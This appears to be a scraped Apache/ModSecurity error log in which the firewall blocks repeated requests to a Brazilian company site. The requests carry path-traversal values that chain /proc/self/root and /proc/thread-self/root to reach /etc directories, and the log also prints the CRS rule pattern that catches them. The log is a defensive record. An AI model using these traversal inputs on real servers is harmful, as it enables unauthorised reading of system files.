https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Wed Mar 18 06:48:05.700080 2026] [:error] [pid 15051:tid 140411632822016] [client 74.7.243.128:41702] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/audisp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abp01SmAPhZkrhU8w4lDXQAAAI0"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 06:48:07.079932 2026] [:error] [pid 29882:tid 140411725141760] [client 74.7.243.128:58230] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/pm"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abp010zinOy1jxa1j4foOQAAAQI"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 06:48:08.417671 2026] [:error] [pid 11816:tid 140411716749056] [client 74.7.243.128:58238] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/openldap"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abp02Ow_le52K8_3pV21-AAAAgM"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 06:48:09.414709 2026] [:error] [pid 19507:tid 140411674785536] [client 74.7.241.31:37670] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/uwsgi.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abp02dY0UrI5A3LftIxuwwAAAYg"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 06:48:09.723444 2026] [:error] [pid 30077:tid 140411691570944] [client 74.7.243.128:57358] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/dovecot"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abp02fu8EFLIOrSqIpvalgAAAkY"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 06:48:13.679614 2026] [:error] [pid 17887:tid 140411699963648] [client 74.7.243.128:57368] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/ntp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abp03AkwaGbbGflqUZDmJQAAAMU"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 06:48:16.151124 2026] [:error] [pid 29882:tid 140411649607424] [client 74.7.243.128:57382] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/skel"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abp04EzinOy1jxa1j4foOwAAAQs"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Wed Mar 18 06:48:17.436098 2026] [:error] [pid 29882:tid 140411716749056] [client 74.7.243.128:57388] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/opt"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abp04UzinOy1jxa1j4foPAAAAQM"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 06:48:18.907464 2026] [:error] [pid 17653:tid 140411649607424] [client 74.7.241.31:55380] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/yum"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abp04sdf6f5d65gmYZSoHQAAAss"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Wed Mar 18 06:48:21.004972 2026] [:error] [pid 30077:tid 140411725141760] [client 74.7.243.128:57398] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/puppetlabs"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abp05fu8EFLIOrSqIpvamQAAAkI"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 06:48:23.466486 2026] [:error] [pid 30077:tid 140411699963648] [client 74.7.243.128:46768] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/popt.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abp05_u8EFLIOrSqIpvanAAAAkU"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Wed Mar 18 06:48:24.856526 2026] [:error] [pid 15826:tid 140411574073088] [client 74.7.243.128:46772] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/systemd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abp06OoXxyEfFpUF8f9CVAAAAVQ"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 06:48:32.418642 2026] [:error] [pid 15826:tid 140411557287680] [client 74.7.243.128:46776] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/httpd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abp08OoXxyEfFpUF8f9CXQAAAVY"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Wed Mar 18 06:48:33.715649 2026] [:error] [pid 17653:tid 140411548894976] [client 74.7.243.128:54232] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/openldap"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abp08cdf6f5d65gmYZSoIQAAAtc"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Wed Mar 18 06:48:40.241826 2026] [:error] [pid 29882:tid 140411624429312] [client 74.7.243.128:54238] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/dhcp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abp0-EzinOy1jxa1j4foSAAAAQ4"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 06:48:43.633210 2026] [:error] [pid 31803:tid 140411565680384] [client 74.7.243.128:37566] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/tuned"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abp0--yqAr6etmhZHNqRFwAAAFU"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 06:48:47.100538 2026] [:error] [pid 19507:tid 140411582465792] [client 74.7.243.128:37568] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/lwcorp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abp0_9Y0UrI5A3LftIxu1gAAAZM"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 06:48:48.403641 2026] [:error] [pid 26799:tid 140411582465792] [client 74.7.243.128:37570] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/kernel"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abp1ANa6ubjKNq_cu4ZrmQAAA1M"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Wed Mar 18 06:49:00.503199 2026] [:error] [pid 15051:tid 140411624429312] [client 74.7.243.128:43670] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/pki"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abp1DCmAPhZkrhU8w4lDeQAAAI4"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Wed Mar 18 06:49:02.259665 2026] [:error] [pid 29882:tid 140411641214720] [client 74.7.243.128:39724] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/python"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abp1DUzinOy1jxa1j4foSwAAAQw"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Wed Mar 18 06:49:09.028431 2026] [:error] [pid 15826:tid 140411674785536] [client 74.7.243.128:39736] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/audit"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abp1FeoXxyEfFpUF8f9CawAAAUg"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 06:49:10.340276 2026] [:error] [pid 17653:tid 140411699963648] [client 74.7.243.128:33922] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/avahi"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abp1Fsdf6f5d65gmYZSoKgAAAsU"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 06:49:18.443526 2026] [:error] [pid 17653:tid 140411599251200] [client 74.7.243.128:33936] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/pam.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abp1Hsdf6f5d65gmYZSoMwAAAtE"], referer: 